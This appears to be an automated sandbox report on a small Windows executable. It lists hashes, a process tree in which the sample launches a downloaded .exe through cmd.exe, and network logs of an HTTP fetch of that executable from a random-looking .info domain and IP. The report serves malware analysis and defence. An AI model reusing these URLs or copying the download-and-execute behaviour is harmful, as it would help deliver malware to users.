Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/10/2023, 19:17 UTC

General

  • Target

    NEAS.dd38841a447bead5b8beabb267592510.exe

  • Size

    5KB

  • MD5

    dd38841a447bead5b8beabb267592510

  • SHA1

    6b14e1db4af724dc90d4ac4f1b448534b08c27f1

  • SHA256

    ab7f93b129946c311d08f101414530ceafaa15365c06522264b29ac7e9512f28

  • SHA512

    f2e2a39da93258570e9f28be0db4d3fc1510ae05f24ae6a3159509e4e90bcd9eb3c521a16558f46b6149c49d897da0c32a23871a8bbc22006181fab09ba5e6d5

  • SSDEEP

    48:6MjtHxWXZR/4plYRWhxeXzu6fvQJrONvTrg7GtGd9d/9orw2d03z:xtHwXZJ4plYRccjrfYJrO9Tr3aor

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.dd38841a447bead5b8beabb267592510.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.dd38841a447bead5b8beabb267592510.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\20231015T091756_106.exe
      2⤵
        PID:2664

    Network

    • flag-us
      DNS
      20231015t091756_106.ltiapmyzmjxrvrts.info
      NEAS.dd38841a447bead5b8beabb267592510.exe
      Remote address:
      8.8.8.8:53
      Request
      20231015t091756_106.ltiapmyzmjxrvrts.info
      IN A
      Response
      20231015t091756_106.ltiapmyzmjxrvrts.info
      IN CNAME
      ltiapmyzmjxrvrts.info
      ltiapmyzmjxrvrts.info
      IN A
      54.37.238.86
    • flag-pl
      GET
      http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe
      NEAS.dd38841a447bead5b8beabb267592510.exe
      Remote address:
      54.37.238.86:80
      Request
      GET /v4/20231015T091756_106.exe HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: 20231015t091756_106.ltiapmyzmjxrvrts.info
      Connection: Keep-Alive
    • 54.37.238.86:80
      http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe
      http
      NEAS.dd38841a447bead5b8beabb267592510.exe
      524 B
      92 B
      3
      2

      HTTP Request

      GET http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe
    • 8.8.8.8:53
      20231015t091756_106.ltiapmyzmjxrvrts.info
      dns
      NEAS.dd38841a447bead5b8beabb267592510.exe
      87 B
      117 B
      1
      1

      DNS Request

      20231015t091756_106.ltiapmyzmjxrvrts.info

      DNS Response

      54.37.238.86

    MITRE ATT&CK Matrix
